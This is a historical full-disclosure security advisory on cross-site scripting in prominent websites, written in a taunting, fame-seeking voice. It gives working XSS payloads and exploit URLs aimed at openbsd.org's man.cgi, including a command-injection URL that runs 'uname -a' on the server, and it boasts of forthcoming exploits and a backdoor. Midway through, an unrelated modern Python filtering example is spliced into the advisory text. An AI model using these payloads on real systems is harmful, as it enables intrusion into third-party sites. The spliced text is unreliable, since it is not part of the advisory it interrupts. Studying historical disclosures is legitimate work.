What follows is GOBBLES advisory #33. The original version was inappropriate for the list (http://online.securityfocus.com/popups/forums/bugtraq/faq.shtml#0.1.3). With the permission of GOBBLES, an edited advisory is now being sent out. The original, unedited version is located at: http://www.bugtraq.org/advisories/GOBBLES-33.txt

---

Hi,

We saw the Administrivia post today, so we decided to send this in. Hopefully it's not too late. The post mentioned that new forms of cross-site scripting attacks would be accepted. Well, as you'll see, we have some nifty tricks that are discussed, and also some major products are totally torn apart. Most of the sites allow you to download their custom scripts (e.g. man.cgi) so we believe we are justified in giving examples of sites that are affected, especially since this has been the norm on the security lists for a while now. Thanks to all the administrators who were good sports over this.

GOBBLES SECURITY
http://www.bugtraq.org/
GOBBLESat_private

GOBBLES SECURITY ADVISORY #33
Compass, Square, and Slide-rule New Generation CSS

ALERT! ALERT! ALERT! ALERT! ALERT! ALERT! ALERT! ALERT! ALERT! ALERT! ALERT!
############################################################################
#                                                                          #
#  CROSS-SITE SCRIPTING VULNERABILITIES IN PROMINENT WEBSITES AND PRODUCTS #
#                                                                          #
############################################################################
ALERT! ALERT! ALERT! ALERT! ALERT! ALERT! ALERT! ALERT! ALERT! ALERT! ALERT!

I'm over it
You see I'm falling in the fast abyss
Clouded by memories of the past
At last I see
I hear it fading, I can't speak it
Oh yes you will dig my grave
You feeling, finding, always whining
Take my hand now be alive
You see I cannot be forsaken
Because I'm not the only one
We walk amongst you feeding, raping
Must we hide from everyone?

Before we begin, we'd like to mention that recently we've been overwhelmed with emails from journalists asking us questions about our security group.
GOBBLES like this very much because it is sign of his crew becoming very famous and ubiquitous. We be accused of seeking fame and job offers. To this GOBBLES say no, we not after job offers, but yes, we after as much fame and attention as possible and this is why we will be disclosing more serious remote vulnerabilities in OS like Solaris and IRIX in near future. Remote exploit for IRIX can then be complemented with upcoming GOBBLES IRIX backdoor. Current misinterpretation about what GOBBLES mean when he say he group seeking worldwide fame, mostly stem from belief that GOBBLES is supporter of non-disclosure and is being sarcastic. This is wrong, disclosure of rpc.rwalld hole show GOBBLES not supporter of non-disclosure and current development project 'lestat' for another default RPC service in Solaris is leading to further proof that GOBBLES is avid supporter of full-disclosure, especially because it great way to annoy as many Fascists, Communists, and McCarthys as possible ;PPPPPPPPPPP. But GOBBLES primary motivation is becoming as famous as possible. We now co-existing with Bugtraq, making the peace, being ethical, etc.

BACKGROUND
==========

Been a lot of fanfare about cross-site scripting in recent times. Person suggest changing acronym from CSS to XSS so it different from Cascading Style Sheets, but this not really good move because XSS conflict with XML Security Suite from IBM (they company who make computer systems, probably not big fans of stem cell research HEHEHEHEHEHEHEHE).

When GOBBLES Security first dreamed of the CSS technique, pioneered it, refined it, and perfected it, we knew of the dastardly tool of mass destruction that had just materialized. Here was something that could make Joe Average a security expert, something that could be wielded by the little guy to sting and subdue the domineering commercial bullies.
A well-planted CSS attack can undermine the reputation of even the most stringent corporations, thus making it one of the most effective political tools known in cyberspace. It truly is the Queen's Gambit, the Power Set, the Homology Group, and the Achilles Heel of the infosec world.

INNOVATIVE CSS TECHNIQUES
=========================

* JavaScript entities
---------------------

Only hotmail security historians like those at GOBBLES Security know of obscure feature in JavaScript language that make it easy to bypass thing like "<...>", "<script>...</script>", and "javascript:" filter for CSS attack using JavaScript. That is thing called JavaScript entity. Like...

    &{alert('GOBBLES')};

When url-encoded become...

    %26%7balert%28%27GOBBLES%27%29%7d%3b

The beauty of this technique for the adorned CSS exploiter is that the GOBBLES CSS JavaScript Entity can appear almost anywhere with good results. Note that "CERT" page below make no mention of this at all and even say that ampersand is not relied upon by current exploits. Well, now it is.

http://www.cert.org/tech_tips/malicious_code_mitigation.html

For reference, HTML4 specification only require you to encode the following:

    ;  %3b
    /  %2f
    ?  %3f
    :  %3a
    @  %40
    =  %3d
    &  %26
    <  %3c
    >  %3e
    "  %22
    #  %23
    %  %25
    {  %7b
    }  %7d
    |  %7c
    \  %5c
    ^  %5e
    ~  %7e
    [  %5b
    ]  %5d
    `  %60

Until now, that encoding information was private knowledge of the underground. GOBBLES is about information dissemination and believe information wants to be free, though. So really GOBBLES see no need why he should have to justify the disclosure of the encoding techniques. If GOBBLES didn't do it, someone would have, and it best this come from a whitehat retard than from someone making the big dollar.

Sometimes in URLs below we can't encode parameter, but this no problem for GOBBLES because smart thing to do is just not enter the character encoded, i.e. enter it literally with no %XX, e.g. '>' gets entered as '>', i.e. '>' does not get entered as '%3e'. Why?
Because sometimes in URLs below we can't encode parameter.

* HTML string completion / HTML closure
---------------------------------------

Principles are basically identical to SQL injection technique. Doesn't need much coverage since it pretty obvious to anyone with rational mind. GOBBLES will let "CERT" write a dissertation on it. Essentially...

*** HTML string completion:

    <a href="[...]$user_provided">

Make $user_provided:

    " attribute="malicious_data

Then original text becomes

    <a href="[...]" attribute="malicious data">

Good to make 'attribute' event handlers like onMouseOver, onLoad, onClick, etc. But can just use common attribute like 'id' and just insert GOBBLES CSS JavaScript Entity.

*** HTML closure:

    <a href="[...]$user_provided">

Make $user_provided:

    "> <tag attribute="malicious data">

Then original text becomes

    <a href="[...]"> <tag attribute="malicious data">">

Good way to introduce <script> tag, etc. Or GOBBLES CSS JavaScript Entity can be inserted.

Again, these two are blatantly obvious and probably have many appearance on the Vuln-Dev already. GOBBLES CSS JavaScript Entity Technique make them almost obsolete.

THE VULNERABILITIES
===================

1. openbsd.org / man.cgi
------------------------

You can get source code like so:

http://www.openbsd.org/cgi-bin/man.cgi/source

Should be noted that up until a few months ago, '/usr/include' processing was vulnerable to simple PERL open() attack.

    sub include_output {
        local($inc) = @_;
        &http_header("text/plain");
        open(I, "$inc") || do { print "open $inc: $!\n"; exit(1) };
        while(<I>) { print }
        close(I);
    }

So you could do like...

http://www.openbsd.org/cgi-bin/man.cgi/usr/include;IFS=G;unameG-a;|

... work your way up to local access and core the box with your Solaris locals. Then they try thing like -T taint switch, removing /bin/sh, etc. but futile attempt since existence of GOBBLESpserver-ex.c that will be disclosed soon (hehehe, Theo, I HATE YOU!).
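As an added defender-side example (not from the advisory), here is a small Python filter that covers both the JavaScript entity technique and the HTML string completion / closure techniques described above. The INPUT-tag template, the CGI form it stands in for, and the sample inputs are all constructed for illustration.

```python
import html
from urllib.parse import unquote

# Constructed sample inputs, modelled on the three techniques in the advisory.
JS_ENTITY = "&{alert('GOBBLES')};"
JS_ENTITY_ENCODED = "%26%7balert%28%27GOBBLES%27%29%7d%3b"   # same entity, url-encoded
STRING_COMPLETION = '" onmouseover="alert(1)'                 # HTML string completion
HTML_CLOSURE = '"> <script>alert(1)</script>'                 # HTML closure


def attr_escape(value: str) -> str:
    """Escape a value for placement inside a double-quoted HTML attribute.

    html.escape() with quote=True rewrites & " ' < and >, so the '&' that
    opens a JavaScript entity becomes '&amp;' and the '"' that opens string
    completion or closure becomes '&quot;'. The browser decodes these back
    to literal characters inside the attribute value, where they are inert.
    """
    return html.escape(value, quote=True)


def render_query_input(query: str) -> str:
    """Hypothetical CGI search form echoing the user's query into an INPUT
    tag; the value is escaped first instead of being inserted verbatim."""
    return f'<INPUT VALUE="{attr_escape(query)}" NAME="query">'


def looks_like_js_entity(raw_param: str) -> bool:
    """Detection check for a raw query-string parameter.

    Percent-decode once (as the CGI would) so the encoded and literal forms
    both match, then look for the '&{' ... '}' shape of a JavaScript entity.
    """
    decoded = unquote(raw_param)
    start = decoded.find("&{")
    return start != -1 and decoded.find("}", start) != -1


def attribute_is_intact(rendered: str) -> bool:
    """Sanity check on rendered markup: only the template's own four double
    quotes survive, and no '<' beyond the INPUT tag itself was introduced."""
    return rendered.count('"') == 4 and rendered.count("<") == 1
```

`looks_like_js_entity` is a log-side check for the raw parameter; `attr_escape` is the fix, and `attribute_is_intact` shows that all three sample payloads stay inside the attribute after escaping.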
We mention this in case other people using version of man.cgi from their site from a while ago.

OK, for CSS hole, just a simple matter of linking to...

http://www.openbsd.org/cgi-bin/man.cgi?query=%26%7balert%28%27GOBBLES%27%29%7d%3b&apropos=hehehe

Examine HTML source to see how GOBBLES CSS JavaScript Entity Technique bypasses the most anal filtering, even when "javascript:..." not always appropriate and automatic JavaScript event handlers don't apply.

    <INPUT VALUE="&{alert('GOBBLES')};" NAME="query">

Shouldn't be too hard to think of how malicious website owner can use this for CSS attacks against visitor web browser that implicitly trusts openbsd.org -- and who wouldn't since it the cornerstone of security?

2. happyhacker.org / thttpd webserver proper / thttpd ssi program
-----------------------------------------------------------------

The default 404 handling of the thttpd webserver is vulnerable to CSS attacks. All you have to do is....

http://thttpd-site/